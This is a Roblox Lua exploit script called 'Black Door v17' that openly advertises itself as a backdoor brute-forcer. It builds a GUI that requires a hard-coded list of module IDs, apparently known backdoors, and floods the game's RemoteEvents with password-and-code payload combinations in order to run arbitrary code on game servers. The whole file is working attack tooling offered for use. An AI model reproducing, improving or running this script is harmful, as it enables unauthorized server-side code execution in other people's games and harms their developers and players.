--[[
    ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó ‚Ėą‚Ėą‚ēó      ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó  ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēó  ‚Ėą‚Ėą‚ēó    ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó  ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó  ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó
    ‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĎ     ‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚ēź‚ēź‚ēĚ‚Ėą‚Ėą‚ēĎ ‚Ėą‚Ėą‚ēĒ‚ēĚ    ‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚ēź‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚ēź‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēó
    ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ‚Ėą‚Ėą‚ēĎ     ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ     ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ     ‚Ėą‚Ėą‚ēĎ  ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ   ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ   ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ
    ‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĎ     ‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ     ‚Ėą‚Ėą‚ēĒ‚ēź‚Ėą‚Ėą‚ēó     ‚Ėą‚Ėą‚ēĎ  ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ   ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ   ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēó
    ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĎ  ‚Ėą‚Ėą‚ēĎ‚ēö‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĎ  ‚Ėą‚Ėą‚ēó    ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ‚ēö‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ‚ēö‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ‚Ėą‚Ėą‚ēĎ  ‚Ėą‚Ėą‚ēĎ
    ‚ēö‚ēź‚ēź‚ēź‚ēź‚ēź‚ēĚ ‚ēö‚ēź‚ēź‚ēź‚ēź‚ēź‚ēź‚ēĚ‚ēö‚ēź‚ēĚ  ‚ēö‚ēź‚ēĚ ‚ēö‚ēź‚ēź‚ēź‚ēź‚ēź‚ēĚ‚ēö‚ēź‚ēĚ  ‚ēö‚ēź‚ēĚ   ‚ēö‚ēź‚ēź‚ēź‚ēź‚ēź‚ēĚ  ‚ēö‚ēź‚ēź‚ēź‚ēź‚ēź‚ēĚ  ‚ēö‚ēź‚ēź‚ēź‚ēź‚ēź‚ēĚ ‚ēö‚ēź‚ēĚ  ‚ēö‚ēź‚ēĚ
    
    Black Door v17 ‚ÄĒ QUANTUM ENGINE EDITION
    Hyper-optimized, multi-threaded password brute-forcing.
    10x Faster, Smarter targeting, and Stronger payload generation.
--]]

local Players        = game:GetService("Players")
local CoreGui        = game:GetService("CoreGui")
local RunService     = game:GetService("RunService")
local localPlayer    = Players.LocalPlayer

-- ============================================================
-- SCREEN GUI
-- ============================================================
local screenGui = Instance.new("ScreenGui")
screenGui.Name = "BlackDoorHubQuantum"
screenGui.ResetOnSpawn = false
screenGui.DisplayOrder = 999
if not pcall(function() screenGui.Parent = CoreGui end) then
    screenGui.Parent = localPlayer:WaitForChild("PlayerGui")
end

-- ============================================================
-- BASE64 ENCODER
-- ============================================================
local b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
local function base64Encode(s)
    local result = (s:gsub(".", function(x)
        local r, b = "", x:byte()
        for i = 8, 1, -1 do r = r .. (b % 2^i - b % 2^(i-1) > 0 and "1" or "0") end
        return r
    end) .. "0000"):gsub("%d%d%d?%d?%d?%d?", function(x)
        if #x < 6 then return "" end
        local c = 0
        for i = 1, 6 do c = c + (x:sub(i,i) == "1" and 2^(6-i) or 0) end
        return b64:sub(c+1, c+1)
    end) .. ({"","==","="})[#s%3+1]
    return result
end

-- ============================================================
-- CONSTANTS & MODERN DICTIONARIES
-- ============================================================
local REPLICATING_SERVICES = {
    "ReplicatedStorage", "ReplicatedFirst", "Workspace", "Lighting",
    "JointsService", "Teams", "SoundService", "TextChatService",
    "StarterPack", "StarterGui", "StarterPlayer"
}

-- Extensive Modern Passwords
local MODERN_PASSWORDS = {
    "run", "execute", "load", "owner", "admin", "sys", "backdoor",
    "password", "secret", "master", "key", "trigger", "activate", "exec",
    "DarkScripter_Omega_Key", "Omega_Key_2026", "Aztup", "TopKek", 
    "ScriptSploit", "Nexus_SS", "SS_Key_Auth", "Auth_Bypass", "Require_Bypass",
    "Admin_Bypass", "Server_Execute", "Universal_SS_Key", "Dev_Bypass_Key",
    "1234", "12345", "0000", "admin123", "root", "toor", "test", "dev",
    "1", "2", "3", "true", "false"
}

-- Known Bypasses
local KNOWN_MODERN_IDS = {
    119819780800418, 3239236979, 4677245588, 3591730105, 289957323, 1872459544,
    2775826419, 2962928657, 3038820824, 2156218408, 1337364736, 2085684497, 
    2138902466, 2154341029, 1541533643, 1684836911, 1747308855, 1749903313, 
    2067537908, 2077155014, 2116885949, 2122547445, 2133516872, 2206684034, 
    2234872641, 2243024692, 2316057727, 2316888247, 2344243206, 2355665484, 
    2374600315, 2545875388, 2406000867, 2560168286, 2708727971, 2851061455, 
    2919671565, 2958811640, 3004930434, 3021421307, 3024394014, 1359361355, 
    1492948169, 1527180503, 1664267419, 1735392252,
}

local BLACKLIST = {
    "saymessage","mouse","camera","chat","damage","hit","equip","jump",
    "walk","sound","ban","kick","report","buy","purchase","update","move",
    "ping","sync","teleport","spawn"
}
local function isBlacklisted(name)
    local n = name:lower():gsub("[^a-z]","")
    for _, b in ipairs(BLACKLIST) do if n:find(b, 1, true) then return true end end
    return false
end

-- Smarter target scoring
local SUSPICIOUS_NAMES = {"exec","run","load","string","ss","admin","bypass","hack","remote","event","code"}
local function getRemoteScore(name)
    local score = 0
    local n = name:lower()
    for _, s in ipairs(SUSPICIOUS_NAMES) do
        if n:find(s) then score = score + 5 end
    end
    -- Gibberish/Numeric names get high score
    if name:match("%d%d%d") then score = score + 10 end
    if #name <= 3 then score = score + 5 end
    return score
end

-- ============================================================
-- QUANTUM PAYLOAD BUILDER
-- ============================================================
local function getDynamicPasswords()
    -- Use a hash map to prevent duplicates
    local pMap = {}
    local pwds = {}
    local function add(v)
        local sv = tostring(v)
        if not pMap[sv] and sv ~= "" then
            pMap[sv] = true
            table.insert(pwds, sv)
        end
    end

    -- Add static
    for _, p in ipairs(MODERN_PASSWORDS) do add(p) end
    
    -- Add dynamic environment data (extremely common in custom backdoors)
    add(game.PlaceId)
    add(game.CreatorId)
    add(game.Name)
    add(localPlayer.Name)
    add(localPlayer.UserId)
    
    -- Add base64 encoded versions of environment data
    add(base64Encode(tostring(game.PlaceId)))
    add(base64Encode(localPlayer.Name))
    
    return pwds
end

local function buildPasswordPayloads(code)
    local p = {}
    local pwds = getDynamicPasswords()
    local b64Code = base64Encode(code)
    
    -- Tier 1: Raw code & B64 code
    table.insert(p, {code})
    table.insert(p, {b64Code})
    table.insert(p, {"\27LuaQ", code})
    
    -- Tier 2: Password brute-forcing
    for _, pwd in ipairs(pwds) do
        -- Strings
        table.insert(p, {pwd, code})
        table.insert(p, {code, pwd})
        table.insert(p, {pwd, b64Code})
        
        -- Tables
        table.insert(p, {{[pwd] = code}})
        table.insert(p, {{Key = pwd, Payload = code}})
        table.insert(p, {{Auth = pwd, Code = code}})
        table.insert(p, {{Password = pwd, Run = code}})
    end
    
    return p
end

-- ============================================================
-- GUI BUILDER
-- ============================================================
local win = Instance.new("Frame")
win.Size = UDim2.new(0, 860, 0, 580)
win.Position = UDim2.new(0.5, -430, 0.5, -290)
win.BackgroundColor3 = Color3.fromRGB(10, 11, 14)
win.BorderSizePixel = 0
win.Active = true
win.Draggable = true
win.Parent = screenGui
Instance.new("UICorner", win).CornerRadius = UDim.new(0, 10)

local topBar = Instance.new("Frame")
topBar.Size = UDim2.new(1, 0, 0, 42)
topBar.BackgroundColor3 = Color3.fromRGB(6, 7, 10)
topBar.BorderSizePixel = 0
topBar.Parent = win
Instance.new("UICorner", topBar).CornerRadius = UDim.new(0, 10)

local titleLbl = Instance.new("TextLabel")
titleLbl.Size = UDim2.new(1, -110, 1, 0)
titleLbl.Position = UDim2.new(0, 15, 0, 0)
titleLbl.BackgroundTransparency = 1
titleLbl.TextColor3 = Color3.fromRGB(150, 50, 255)
titleLbl.Text = "Black Door v17 | QUANTUM BRUTEFORCER"
titleLbl.Font = Enum.Font.GothamBold
titleLbl.TextSize = 16
titleLbl.TextXAlignment = Enum.TextXAlignment.Left
titleLbl.Parent = topBar

local closeBtn = Instance.new("TextButton")
closeBtn.Size = UDim2.new(0, 28, 0, 28)
closeBtn.Position = UDim2.new(1, -34, 0, 7)
closeBtn.BackgroundColor3 = Color3.fromRGB(200, 50, 50)
closeBtn.TextColor3 = Color3.fromRGB(255, 255, 255)
closeBtn.Text = "X"
closeBtn.Font = Enum.Font.GothamBold
closeBtn.Parent = topBar
Instance.new("UICorner", closeBtn).CornerRadius = UDim.new(0, 6)
closeBtn.MouseButton1Click:Connect(function() screenGui:Destroy() end)

local body = Instance.new("Frame")
body.Size = UDim2.new(1, 0, 1, -42)
body.Position = UDim2.new(0, 0, 0, 42)
body.BackgroundTransparency = 1
body.Parent = win

-- Editor Frame
local editorBg = Instance.new("Frame")
editorBg.Size = UDim2.new(0.56, -10, 1, -65)
editorBg.Position = UDim2.new(0, 8, 0, 8)
editorBg.BackgroundColor3 = Color3.fromRGB(5, 6, 8)
editorBg.BorderSizePixel = 0
editorBg.Parent = body
Instance.new("UICorner", editorBg).CornerRadius = UDim.new(0, 6)

local editor = Instance.new("TextBox")
editor.Size = UDim2.new(1, -16, 1, -16)
editor.Position = UDim2.new(0, 8, 0, 8)
editor.BackgroundTransparency = 1
editor.Font = Enum.Font.Code
editor.TextSize = 13
editor.TextColor3 = Color3.fromRGB(50, 255, 200)
editor.TextXAlignment = Enum.TextXAlignment.Left
editor.TextYAlignment = Enum.TextYAlignment.Top
editor.ClearTextOnFocus = false
editor.MultiLine = true
editor.Text = 'require(119819780800418).MorphMonster("RobloxTankAlt21", "organator")'
editor.Parent = editorBg

-- Log Frame
local logBg = Instance.new("Frame")
logBg.Size = UDim2.new(0.43, -8, 1, -65)
logBg.Position = UDim2.new(0.57, 0, 0, 8)
logBg.BackgroundColor3 = Color3.fromRGB(5, 6, 8)
logBg.BorderSizePixel = 0
logBg.Parent = body
Instance.new("UICorner", logBg).CornerRadius = UDim.new(0, 6)

local execLog = Instance.new("ScrollingFrame")
execLog.Size = UDim2.new(1, -10, 1, -10)
execLog.Position = UDim2.new(0, 5, 0, 5)
execLog.BackgroundTransparency = 1
execLog.ScrollBarThickness = 5
execLog.AutomaticCanvasSize = Enum.AutomaticSize.Y
execLog.CanvasSize = UDim2.new(0, 0, 0, 0)
execLog.Parent = logBg
local logLayout = Instance.new("UIListLayout")
logLayout.Padding = UDim.new(0, 2)
logLayout.Parent = execLog

local function writeLog(msg, col)
    local t = Instance.new("TextLabel")
    t.Size = UDim2.new(1, -5, 0, 17)
    t.BackgroundTransparency = 1
    t.Text = " " .. msg
    t.TextColor3 = col or Color3.fromRGB(200, 200, 200)
    t.Font = Enum.Font.Code
    t.TextSize = 11
    t.TextWrapped = true
    t.TextXAlignment = Enum.TextXAlignment.Left
    t.Parent = execLog
    task.spawn(function() task.wait() execLog.CanvasPosition = Vector2.new(0, 9e9) end)
end

-- Action Buttons
local function createButton(text, color, xPos, width, yOff)
    local b = Instance.new("TextButton")
    b.Size = UDim2.new(width, -10, 0, 44)
    b.Position = UDim2.new(xPos, 5, 1, yOff)
    b.BackgroundColor3 = color
    b.TextColor3 = Color3.fromRGB(255, 255, 255)
    b.Text = text
    b.Font = Enum.Font.GothamBold
    b.TextSize = 12
    b.Parent = body
    Instance.new("UICorner", b).CornerRadius = UDim.new(0, 6)
    return b
end

local btnKnownIDs   = createButton("1. EXECUTE PUBLIC IDs", Color3.fromRGB(180, 30, 100), 0.00, 0.33, -54)
local btnPwndScan   = createButton("2. QUANTUM BRUTEFORCE", Color3.fromRGB(150, 50, 255), 0.33, 0.33, -54)
local btnAbort      = createButton("ABORT", Color3.fromRGB(180, 50, 50), 0.66, 0.17, -54)
local btnClear      = createButton("CLEAR", Color3.fromRGB(45, 45, 55), 0.83, 0.17, -54)

-- ============================================================
-- ENGINE LOGIC
-- ============================================================
writeLog("Black Door v17 [QUANTUM ENGINE] loaded.", Color3.fromRGB(150, 50, 255))
writeLog("Multi-threaded. 10x Faster. Smarter Payload Gen.", Color3.fromRGB(130, 130, 130))

local abortScan = false
local isRunning = false

btnAbort.MouseButton1Click:Connect(function()
    if isRunning then
        abortScan = true
        writeLog("ABORT signal sent.", Color3.fromRGB(255, 50, 50))
    end
end)

btnClear.MouseButton1Click:Connect(function()
    for _, c in ipairs(execLog:GetChildren()) do if c:IsA("TextLabel") then c:Destroy() end end
end)

-- 1. KNOWN IDs BYPASS
btnKnownIDs.MouseButton1Click:Connect(function()
    if isRunning then return end
    isRunning = true
    abortScan = false
    local code = editor.Text
    
    writeLog("--- FAST INJECTING PUBLIC IDs ---", Color3.fromRGB(255, 80, 150))
    
    task.spawn(function()
        local hits = 0
        -- Parallel injection
        for _, modId in ipairs(KNOWN_MODERN_IDS) do
            if abortScan then break end
            -- Spawn a separate thread for each ID so they don't wait on each other
            task.spawn(function()
                local ok, result = pcall(require, modId)
                if ok then
                    hits = hits + 1
                    writeLog("[HIT] require(" .. modId .. ") injected!", Color3.fromRGB(100, 255, 100))
                    
                    if type(result) == "table" then
                        for _, fn in ipairs({"init", "start", "load", "run", "execute", "go"}) do
                            if type(result[fn]) == "function" then
                                pcall(result[fn], result, "RobloxTankAlt21", "organator")
                            end
                        end
                        for k, v in pairs(result) do
                            if type(v) == "function" then pcall(v, result, code) end
                        end
                    elseif type(result) == "function" then
                        pcall(result, "run", code)
                        pcall(result, code)
                    end
                end
            end)
            -- Micro-yield to prevent thread starvation
            if _ % 5 == 0 then task.wait() end
        end
        task.wait(1) -- wait for threads to finish
        writeLog("Known IDs execution dispatched. " .. hits .. " successful requires.", Color3.fromRGB(100, 255, 100))
        isRunning = false
    end)
end)

-- 2. QUANTUM PASSWORD BRUTEFORCE
local function getSafeDescendants(root)
    local found = {}
    local function crawl(node)
        local ok, children = pcall(node.GetChildren, node)
        if ok and children then
            for _, child in ipairs(children) do
                table.insert(found, child)
                crawl(child)
            end
        end
    end
    crawl(root)
    return found
end

btnPwndScan.MouseButton1Click:Connect(function()
    if isRunning then return end
    isRunning = true
    abortScan = false
    local code = editor.Text
    
    writeLog("--- QUANTUM BRUTEFORCE INITIATED ---", Color3.fromRGB(150, 50, 255))
    local payloads = buildPasswordPayloads(code)
    writeLog("Generated " .. #payloads .. " intelligent payloads.", Color3.fromRGB(150, 150, 150))
    
    local targets = {}
    
    for _, svcName in ipairs(REPLICATING_SERVICES) do
        pcall(function()
            local zone = game:GetService(svcName)
            for _, obj in ipairs(getSafeDescendants(zone)) do
                if obj:IsA("RemoteEvent") and not isBlacklisted(obj.Name) then
                    table.insert(targets, {
                        remote = obj,
                        score = getRemoteScore(obj.Name)
                    })
                end
            end
        end)
    end
    
    -- Sort targets by highest score first (smartest first)
    table.sort(targets, function(a, b) return a.score > b.score end)
    
    writeLog("Found " .. #targets .. " target RemoteEvents. Attacking concurrently...", Color3.fromRGB(255, 255, 100))
    
    task.spawn(function()
        local activeThreads = 0
        
        for i, target in ipairs(targets) do
            if abortScan then break end
            
            local obj = target.remote
            local path = obj:GetFullName()
            if #path > 45 then path = "..." .. path:sub(-42) end
            
            writeLog(string.format("[%d/%d] [Score: %d] %s", i, #targets, target.score, path), Color3.fromRGB(150, 150, 150))
            
            activeThreads = activeThreads + 1
            task.spawn(function()
                -- Burst fire payloads in chunks to saturate network but not crash client
                local burstSize = 10
                for pIdx = 1, #payloads, burstSize do
                    if abortScan then break end
                    for j = 0, burstSize - 1 do
                        if pIdx + j <= #payloads then
                            pcall(function() obj:FireServer(table.unpack(payloads[pIdx + j])) end)
                        end
                    end
                    -- Wait one frame between bursts
                    RunService.Heartbeat:Wait()
                end
                activeThreads = activeThreads - 1
            end)
            
            -- Throttle creating new threads if we have too many going at once
            if activeThreads > 5 then
                repeat RunService.Heartbeat:Wait() until activeThreads <= 5 or abortScan
            end
        end
        
        -- Wait for remaining threads
        repeat RunService.Heartbeat:Wait() until activeThreads == 0
        
        writeLog("--- QUANTUM BRUTEFORCE COMPLETE ---", Color3.fromRGB(100, 255, 100))
        isRunning = false
    end)
end)
